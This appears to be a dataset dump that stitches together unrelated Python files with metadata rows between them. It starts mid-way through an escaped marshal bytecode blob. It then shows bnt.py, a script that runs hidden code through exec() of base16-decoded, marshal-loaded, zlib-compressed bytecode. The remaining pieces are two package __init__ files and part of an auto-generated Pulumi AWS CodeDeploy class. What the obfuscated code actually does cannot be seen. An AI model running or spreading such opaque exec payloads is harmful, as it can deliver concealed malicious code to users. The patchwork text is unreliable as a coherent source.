x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00l
oads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\
x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x0
2\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<Sazxt>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x0c\x01'))
except:
os.system('dialog --title "PERINGATAN" --msgbox " TERDAPAT KESALAHAN TEKNISI" 10 45')  # Indonesian: title "WARNING", message "A TECHNICIAN ERROR HAS OCCURRED"
| 13,695.3 | 136,388 | 0.753908 | 30,702 | 136,953 | 3.362419 | 0.024689 | 0.579873 | 0.552992 | 0.526576 | 0.938944 | 0.938944 | 0.93877 | 0.93877 | 0.938508 | 0.938508 | 0 | 0.402408 | 0.00176 | 136,953 | 9 | 136,389 | 15,217 | 0.352705 | 0.003111 | 0 | 0 | 0 | 1.6 | 0.240653 | 0.23987 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 16 |
d225ef214f3d398f4a6d3f2ce2c153c03f7ff0a0 | 4,315 | py | Python | bnt.py | sillytuktuk2020/bnt | 2d60095a6525f8690f0944f6a04866c60cf1a320 | [
"Apache-2.0"
] | null | null | null | bnt.py | sillytuktuk2020/bnt | 2d60095a6525f8690f0944f6a04866c60cf1a320 | [
"Apache-2.0"
] | null | null | null | bnt.py | sillytuktuk2020/bnt | 2d60095a6525f8690f0944f6a04866c60cf1a320 | [
"Apache-2.0"
] | null | null | null | # Author : AKSHAY DHAWAN
# GitHub : https://github.com/sillytuktuk2020
# Instagram : decent_deep_raadhe
import base64
exec(base64.b16decode('2320436F6D70696C6564204279203A2042696E79616D696E0A2320476974487562203A2068747470733A2F2F6769746875622E636F6D2F42696E79616D696E2D62696E6E690A2320596F7554756265204368616E6E656C203A20547269636B2050726F6F660A696D706F7274206D61727368616C0A65786563286D61727368616C2E6C6F6164732827635C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830335C7830305C7830305C783030405C7830305C7830305C78303073215C7830305C7830305C783030645C7830305C783030645C7830315C7830306C5C7830305C7830305A5C7830305C783030655C7830305C7830306A5C7830315C783030645C7830325C7830305C7838335C7830315C783030645C7830315C7830305C78303455645C7830315C78303053285C7830335C7830305C7830305C783030695C7866665C7866665C7866665C7866664E735C7830665C7830325C7830305C783030785C7839635C786264544D5C7838665C786461305C7831303D5C7864375C786266625C7865615C7831655C7830322A49285C78626444485C7831635C7864382E5C7864615C7831655C7864385C7831325C7830315C786162554F5B5C27385C7863316A62475C7866655C7831305C7863625C7862665C7861665C78663349525C786138565C7865645C7861315C786566627B5C7864655C7866335C7863635C78623333315C7863625C78306221355C783038355167355C7864312C5C78613748285C7863665C786365355C78636447385C786365285C783931785C7838635C7864305C7838375C7831325C7862305C7864653C6C5C7861305C7839615C7861324C5C786134625C786531385C7830655C6E5C783161445C7830345C7830305C7865635C7830385C7831355C786361315C7865385C7830315C7862355C7830345C7830655C7861325C7839615C786539645C7863645C786134534C5C7838325C786230225C7865615C786635505C786631525C7863325C72425C7861375C786164705C786135702B5C7830345C7864315C7861345C7863375C7864655C7861615C7866325C7861335C7866365C7864315C7839345C7862385C786135205C7838645C7838663A3C545C7864345C783038715C7861665C786663405C7838315C7864635C7862665C783036425C786230345C786661485C7861355C786364305C7838373B5C7863365C78636624675C7831635C7863315C7830335C7864335F4D545C7830355C7838665A5C7831376A5C7865655C786662295C786433475C783133795C7862315C7863385C7866645C7861385C7864315C786239765C7863325C7831395C7838325C7865665C7863325C78656
34D444B5C7866355E5C7862325C7866385C275C783834525C7838385C7830345C7863315C7839645C7866645E5C7861615C7831305C7862615C783937455C7839377C515C7864325E5C7864345C786230655C7863615C7837665C7866325C7830656F5C7861306C5C7831345C786634454849635C7866645C7861345C7861385C786534245C7861375C7862305C7830305C7864635C7864615C7863372D5C7831395C7831325C7861354E425C7831652A5C7839326B5C7838636C5C7861335C7838395C7863325C7861655C7831632D5C72755C7864305C7865395C786338325C6E5C7861333A5C786438465C7863375C7866335C78636140215C7831395C7864375036665C786235345C7839373A5C7839325C7839635E5C7831382F5C7838635C783165615C7864386F366B785C7864615C7861645C7862365C7864665C7839365C7838665C786162395C7864385C7865362E5C7863352C5C7838315C786431655C7863335C7830327E5C7866335C7864615478575C5C5C7865635D5C7865355C7830635C7839375C7862625C7864645C786633667B5C7864665C7865356C5C7866335E3675795C7864626336795B5C7864345C275C7863305C7862305C783136694A5C7830665C78633038285C7831335C786337545C7861395C786334645C7864395C7831395C7838385C7862325C7864635C7863375C786565605C7838335C7861645C7865355C7839665C7865625C7861395C7838635C786432625C786634693C605C7864615C7830624C485C7861365C7865635C725C786236616A575C7862375C7861623F4B5C786331535C7865385C7862655C7863347B3C505D5E5C7830375C7865375C7866355C7839305C7862615C7861325C7861305C7866635C7861645C7839365C786632675C7864335C7864395C7864345C7839667E5C786636355C7839355C7862397975355C783931295C7864355C78616565725C7863325C7830666E225C7861345C783962445C7865655C786339765C786235305C7864613B5C7865613C735C7863365C7837665C7861385C7864395C786264485C786437475C7831385C7864615C7865665C7862615C786163675C7866665C7837665B5C7862665C7866355C7839305C786636625C7863355C7864395C7865655C786532335C7866305C7862365C7861625C7865355C7866645C7865335C7863615C7863625C783066785C7866635C7830625C786535677A5C783065285C7830325C7830305C7830305C783030745C7830345C7830305C7830305C7830307A6C6962745C6E5C7830305C7830305C7830306465636F6D7072657373285C7830305C7830305C7830305C783030285C7830305C7830305C7830305C783030285C7830305C7830305C7830305
C783030735C7830345C7830305C7830305C7830305C7831625B306D745C7830385C7830305C7830305C7830303C6D6F64756C653E5C7830345C7830305C7830305C783030735C7830325C7830305C7830305C7830305C7830635C783031272929')) | 863 | 4,196 | 0.992121 | 18 | 4,315 | 237.722222 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.842987 | 0.003708 | 4,315 | 5 | 4,196 | 863 | 0.152361 | 0.022711 | 0 | 0 | 0 | 0 | 0.989559 | 0.989559 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 12 |
9645047fc6b87f0e0428edc04ac96fe6d667b987 | 177 | py | Python | icedata/datasets/pets/__init__.py | ganesh3/icedata | 16c26ea3d8f96b99357683849d6bd363bf12a827 | [
"Apache-2.0"
] | 42 | 2020-09-14T18:28:02.000Z | 2022-03-30T19:55:10.000Z | icedata/datasets/pets/__init__.py | ganesh3/icedata | 16c26ea3d8f96b99357683849d6bd363bf12a827 | [
"Apache-2.0"
] | 103 | 2020-09-11T19:50:29.000Z | 2022-03-15T13:07:10.000Z | icedata/datasets/pets/__init__.py | ganesh3/icedata | 16c26ea3d8f96b99357683849d6bd363bf12a827 | [
"Apache-2.0"
] | 19 | 2020-09-11T19:26:50.000Z | 2022-03-15T13:09:44.000Z | from icedata.datasets.pets.data import *
from icedata.datasets.pets.parser import *
from icedata.datasets.pets.dataset import *
from icedata.datasets.pets import trained_models
| 35.4 | 48 | 0.830508 | 25 | 177 | 5.84 | 0.4 | 0.30137 | 0.520548 | 0.630137 | 0.59589 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090395 | 177 | 4 | 49 | 44.25 | 0.906832 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
73959563d2665ea51a6b4130eb9d50119669095b | 136 | py | Python | openapi_data_generator/utils/__init__.py | elyashiv3839/openapi-data-generator | 0dc4828eb84c79dcb7b00b140bb2145cf05ba967 | [
"MIT"
] | null | null | null | openapi_data_generator/utils/__init__.py | elyashiv3839/openapi-data-generator | 0dc4828eb84c79dcb7b00b140bb2145cf05ba967 | [
"MIT"
] | null | null | null | openapi_data_generator/utils/__init__.py | elyashiv3839/openapi-data-generator | 0dc4828eb84c79dcb7b00b140bb2145cf05ba967 | [
"MIT"
] | null | null | null | from .src.KeysHandler import *
from .src.ObjectsHandler import *
from .src.SchemaHandler import *
from .src.LockDir import LockDirectory | 34 | 38 | 0.808824 | 17 | 136 | 6.470588 | 0.470588 | 0.254545 | 0.354545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110294 | 136 | 4 | 38 | 34 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
fbb7c9aefcca231e126cbfaf31ee0ab02910194d | 35,795 | py | Python | sdk/python/pulumi_aws/codedeploy/deployment_group.py | texdc/pulumi-aws | 93a7a28ab7db6b1cd7e6686c0b68aa4c89490d4f | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/codedeploy/deployment_group.py | texdc/pulumi-aws | 93a7a28ab7db6b1cd7e6686c0b68aa4c89490d4f | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/codedeploy/deployment_group.py | texdc/pulumi-aws | 93a7a28ab7db6b1cd7e6686c0b68aa4c89490d4f | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class DeploymentGroup(pulumi.CustomResource):
alarm_configuration: pulumi.Output[dict]
"""
Configuration block of alarms associated with the deployment group (documented below).
* `alarms` (`list`) - A list of alarms configured for the deployment group. _A maximum of 10 alarms can be added to a deployment group_.
* `enabled` (`bool`) - Indicates whether a defined automatic rollback configuration is currently enabled for this Deployment Group. If you enable automatic rollback, you must specify at least one event type.
* `ignorePollAlarmFailure` (`bool`) - Indicates whether a deployment should continue if information about the current state of alarms cannot be retrieved from CloudWatch. The default value is `false`.
* `true`: The deployment will proceed even if alarm status information can't be retrieved.
* `false`: The deployment will stop if alarm status information can't be retrieved.
"""
app_name: pulumi.Output[str]
"""
The name of the application.
"""
auto_rollback_configuration: pulumi.Output[dict]
"""
Configuration block of the automatic rollback configuration associated with the deployment group (documented below).
* `enabled` (`bool`) - Indicates whether a defined automatic rollback configuration is currently enabled for this Deployment Group. If you enable automatic rollback, you must specify at least one event type.
* `events` (`list`) - The event type or types that trigger a rollback. Supported types are `DEPLOYMENT_FAILURE` and `DEPLOYMENT_STOP_ON_ALARM`.
"""
autoscaling_groups: pulumi.Output[list]
"""
Autoscaling groups associated with the deployment group.
"""
blue_green_deployment_config: pulumi.Output[dict]
"""
Configuration block of the blue/green deployment options for a deployment group (documented below).
* `deploymentReadyOption` (`dict`) - Information about the action to take when newly provisioned instances are ready to receive traffic in a blue/green deployment (documented below).
* `actionOnTimeout` (`str`) - When to reroute traffic from an original environment to a replacement environment in a blue/green deployment.
* `CONTINUE_DEPLOYMENT`: Register new instances with the load balancer immediately after the new application revision is installed on the instances in the replacement environment.
* `STOP_DEPLOYMENT`: Do not register new instances with load balancer unless traffic is rerouted manually. If traffic is not rerouted manually before the end of the specified wait period, the deployment status is changed to Stopped.
* `waitTimeInMinutes` (`float`) - The number of minutes to wait before the status of a blue/green deployment changed to Stopped if rerouting is not started manually. Applies only to the `STOP_DEPLOYMENT` option for `action_on_timeout`.
* `greenFleetProvisioningOption` (`dict`) - Information about how instances are provisioned for a replacement environment in a blue/green deployment (documented below).
* `action` (`str`) - The action to take on instances in the original environment after a successful blue/green deployment.
* `TERMINATE`: Instances are terminated after a specified wait time.
* `KEEP_ALIVE`: Instances are left running after they are deregistered from the load balancer and removed from the deployment group.
* `terminateBlueInstancesOnDeploymentSuccess` (`dict`) - Information about whether to terminate instances in the original fleet during a blue/green deployment (documented below).
* `action` (`str`) - The action to take on instances in the original environment after a successful blue/green deployment.
* `TERMINATE`: Instances are terminated after a specified wait time.
* `KEEP_ALIVE`: Instances are left running after they are deregistered from the load balancer and removed from the deployment group.
* `terminationWaitTimeInMinutes` (`float`) - The number of minutes to wait after a successful blue/green deployment before terminating instances from the original environment.
"""
deployment_config_name: pulumi.Output[str]
"""
The name of the group's deployment config. The default is "CodeDeployDefault.OneAtATime".
"""
deployment_group_name: pulumi.Output[str]
"""
The name of the deployment group.
"""
deployment_style: pulumi.Output[dict]
"""
Configuration block of the type of deployment, either in-place or blue/green, you want to run and whether to route deployment traffic behind a load balancer (documented below).
* `deploymentOption` (`str`) - Indicates whether to route deployment traffic behind a load balancer. Valid Values are `WITH_TRAFFIC_CONTROL` or `WITHOUT_TRAFFIC_CONTROL`.
* `deploymentType` (`str`) - Indicates whether to run an in-place deployment or a blue/green deployment. Valid Values are `IN_PLACE` or `BLUE_GREEN`.
"""
ec2_tag_filters: pulumi.Output[list]
"""
Tag filters associated with the deployment group. See the AWS docs for details.
* `key` (`str`) - The key of the tag filter.
* `type` (`str`) - The type of the tag filter, either `KEY_ONLY`, `VALUE_ONLY`, or `KEY_AND_VALUE`.
* `value` (`str`) - The value of the tag filter.
"""
ec2_tag_sets: pulumi.Output[list]
"""
Configuration block(s) of Tag filters associated with the deployment group, which are also referred to as tag groups (documented below). See the AWS docs for details.
* `ec2_tag_filters` (`list`) - Tag filters associated with the deployment group. See the AWS docs for details.
* `key` (`str`) - The key of the tag filter.
* `type` (`str`) - The type of the tag filter, either `KEY_ONLY`, `VALUE_ONLY`, or `KEY_AND_VALUE`.
* `value` (`str`) - The value of the tag filter.
"""
ecs_service: pulumi.Output[dict]
"""
Configuration block(s) of the ECS services for a deployment group (documented below).
* `clusterName` (`str`) - The name of the ECS cluster.
* `serviceName` (`str`) - The name of the ECS service.
"""
load_balancer_info: pulumi.Output[dict]
"""
Single configuration block of the load balancer to use in a blue/green deployment (documented below).
* `elbInfos` (`list`) - The Classic Elastic Load Balancer to use in a deployment. Conflicts with `target_group_info` and `target_group_pair_info`.
* `name` (`str`) - Name of the target group.
* `targetGroupInfos` (`list`) - The (Application/Network Load Balancer) target group to use in a deployment. Conflicts with `elb_info` and `target_group_pair_info`.
* `name` (`str`) - Name of the target group.
* `targetGroupPairInfo` (`dict`) - The (Application/Network Load Balancer) target group pair to use in a deployment. Conflicts with `elb_info` and `target_group_info`.
* `prodTrafficRoute` (`dict`) - Configuration block for the production traffic route (documented below).
* `listenerArns` (`list`) - List of Amazon Resource Names (ARNs) of the load balancer listeners.
* `targetGroups` (`list`) - Configuration blocks for a target group within a target group pair (documented below).
* `name` (`str`) - Name of the target group.
* `testTrafficRoute` (`dict`) - Configuration block for the test traffic route (documented below).
* `listenerArns` (`list`) - List of Amazon Resource Names (ARNs) of the load balancer listeners.
"""
on_premises_instance_tag_filters: pulumi.Output[list]
"""
    On-premises tag filters associated with the group. See the AWS docs for details.
* `key` (`str`) - The key of the tag filter.
* `type` (`str`) - The type of the tag filter, either `KEY_ONLY`, `VALUE_ONLY`, or `KEY_AND_VALUE`.
* `value` (`str`) - The value of the tag filter.
"""
service_role_arn: pulumi.Output[str]
"""
The service role ARN that allows deployments.
"""
trigger_configurations: pulumi.Output[list]
"""
Configuration block(s) of the triggers for the deployment group (documented below).
* `triggerEvents` (`list`) - The event type or types for which notifications are triggered. Some values that are supported: `DeploymentStart`, `DeploymentSuccess`, `DeploymentFailure`, `DeploymentStop`, `DeploymentRollback`, `InstanceStart`, `InstanceSuccess`, `InstanceFailure`. See [the CodeDeploy documentation][1] for all possible values.
* `triggerName` (`str`) - The name of the notification trigger.
* `triggerTargetArn` (`str`) - The ARN of the SNS topic through which notifications are sent.
"""
def __init__(__self__, resource_name, opts=None, alarm_configuration=None, app_name=None, auto_rollback_configuration=None, autoscaling_groups=None, blue_green_deployment_config=None, deployment_config_name=None, deployment_group_name=None, deployment_style=None, ec2_tag_filters=None, ec2_tag_sets=None, ecs_service=None, load_balancer_info=None, on_premises_instance_tag_filters=None, service_role_arn=None, trigger_configurations=None, __props__=None, __name__=None, __opts__=None):
"""
Provides a CodeDeploy Deployment Group for a CodeDeploy Application
> **NOTE on blue/green deployments:** When using `green_fleet_provisioning_option` with the `COPY_AUTO_SCALING_GROUP` action, CodeDeploy will create a new ASG with a different name. This ASG is _not_ managed by this provider and will conflict with existing configuration and state. You may want to use a different approach to managing deployments that involve multiple ASG, such as `DISCOVER_EXISTING` with separate blue and green ASG.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[dict] alarm_configuration: Configuration block of alarms associated with the deployment group (documented below).
:param pulumi.Input[str] app_name: The name of the application.
:param pulumi.Input[dict] auto_rollback_configuration: Configuration block of the automatic rollback configuration associated with the deployment group (documented below).
:param pulumi.Input[list] autoscaling_groups: Autoscaling groups associated with the deployment group.
:param pulumi.Input[dict] blue_green_deployment_config: Configuration block of the blue/green deployment options for a deployment group (documented below).
:param pulumi.Input[str] deployment_config_name: The name of the group's deployment config. The default is "CodeDeployDefault.OneAtATime".
:param pulumi.Input[str] deployment_group_name: The name of the deployment group.
:param pulumi.Input[dict] deployment_style: Configuration block of the type of deployment, either in-place or blue/green, you want to run and whether to route deployment traffic behind a load balancer (documented below).
:param pulumi.Input[list] ec2_tag_filters: Tag filters associated with the deployment group. See the AWS docs for details.
:param pulumi.Input[list] ec2_tag_sets: Configuration block(s) of Tag filters associated with the deployment group, which are also referred to as tag groups (documented below). See the AWS docs for details.
:param pulumi.Input[dict] ecs_service: Configuration block(s) of the ECS services for a deployment group (documented below).
:param pulumi.Input[dict] load_balancer_info: Single configuration block of the load balancer to use in a blue/green deployment (documented below).
:param pulumi.Input[list] on_premises_instance_tag_filters: On-premises tag filters associated with the group. See the AWS docs for details.
:param pulumi.Input[str] service_role_arn: The service role ARN that allows deployments.
:param pulumi.Input[list] trigger_configurations: Configuration block(s) of the triggers for the deployment group (documented below).
The **alarm_configuration** object supports the following:
* `alarms` (`pulumi.Input[list]`) - A list of alarms configured for the deployment group. _A maximum of 10 alarms can be added to a deployment group_.
* `enabled` (`pulumi.Input[bool]`) - Indicates whether the alarm configuration is enabled for this deployment group.
* `ignorePollAlarmFailure` (`pulumi.Input[bool]`) - Indicates whether a deployment should continue if information about the current state of alarms cannot be retrieved from CloudWatch. The default value is `false`.
* `true`: The deployment will proceed even if alarm status information can't be retrieved.
* `false`: The deployment will stop if alarm status information can't be retrieved.
The **auto_rollback_configuration** object supports the following:
* `enabled` (`pulumi.Input[bool]`) - Indicates whether a defined automatic rollback configuration is currently enabled for this Deployment Group. If you enable automatic rollback, you must specify at least one event type.
* `events` (`pulumi.Input[list]`) - The event type or types that trigger a rollback. Supported types are `DEPLOYMENT_FAILURE` and `DEPLOYMENT_STOP_ON_ALARM`.
The **blue_green_deployment_config** object supports the following:
* `deploymentReadyOption` (`pulumi.Input[dict]`) - Information about the action to take when newly provisioned instances are ready to receive traffic in a blue/green deployment (documented below).
* `actionOnTimeout` (`pulumi.Input[str]`) - When to reroute traffic from an original environment to a replacement environment in a blue/green deployment.
* `CONTINUE_DEPLOYMENT`: Register new instances with the load balancer immediately after the new application revision is installed on the instances in the replacement environment.
* `STOP_DEPLOYMENT`: Do not register new instances with the load balancer unless traffic is rerouted manually. If traffic is not rerouted manually before the end of the specified wait period, the deployment status is changed to Stopped.
* `waitTimeInMinutes` (`pulumi.Input[float]`) - The number of minutes to wait before the status of a blue/green deployment is changed to Stopped if rerouting is not started manually. Applies only to the `STOP_DEPLOYMENT` option for `action_on_timeout`.
* `greenFleetProvisioningOption` (`pulumi.Input[dict]`) - Information about how instances are provisioned for a replacement environment in a blue/green deployment (documented below).
